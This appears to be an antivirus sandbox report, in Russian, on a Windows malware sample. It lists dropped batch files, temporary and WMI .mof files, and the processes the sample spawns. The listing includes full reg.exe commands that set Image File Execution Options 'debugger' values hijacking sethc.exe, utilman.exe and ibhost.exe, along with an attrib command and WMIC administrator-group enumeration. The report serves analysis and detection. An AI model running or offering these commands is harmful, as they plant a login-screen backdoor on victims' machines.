Техническая информация: изменения в реестре (значение 'debugger' в ключе Image File Execution Options для sethc.exe, ibhost.exe и utilman.exe, из-за чего вместо них запускаются drmsvc.exe и wpmsvc.exe), создаваемые файлы и запускаемые процессы
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe] 'debugger' = 'drmsvc.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibhost.exe] 'debugger' = 'drmsvc.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe] 'debugger' = 'wpmsvc.exe'
- <Текущая директория>\SH.bat
- <Текущая директория>\U.bat
- <Текущая директория>\prop.exe
- %TEMP%\tmp1.tmp
- %TEMP%\tmp2.tmp
- <SYSTEM32>\wbem\AutoRecover\C8463ECBE33BC240263A0B094E46D510.mof
- %TEMP%\tmp3.tmp
- <SYSTEM32>\wbem\AutoRecover\23BDE61F1F4FACE17E9B0C01F2A1FD9B.mof
- %TEMP%\tmp1.tmp
- %TEMP%\tmp2.tmp
- %TEMP%\tmp3.tmp
- ClassName: 'EDIT' WindowName: ''
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\U.bat" "
- '<SYSTEM32>\cmd.exe' /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
- '<SYSTEM32>\find.exe' "="
- '<SYSTEM32>\cmd.exe' /c ""<Текущая директория>\SH.bat" "
- '<SYSTEM32>\attrib.exe' -h -s -r <SYSTEM32>\dllcache
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibhost.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f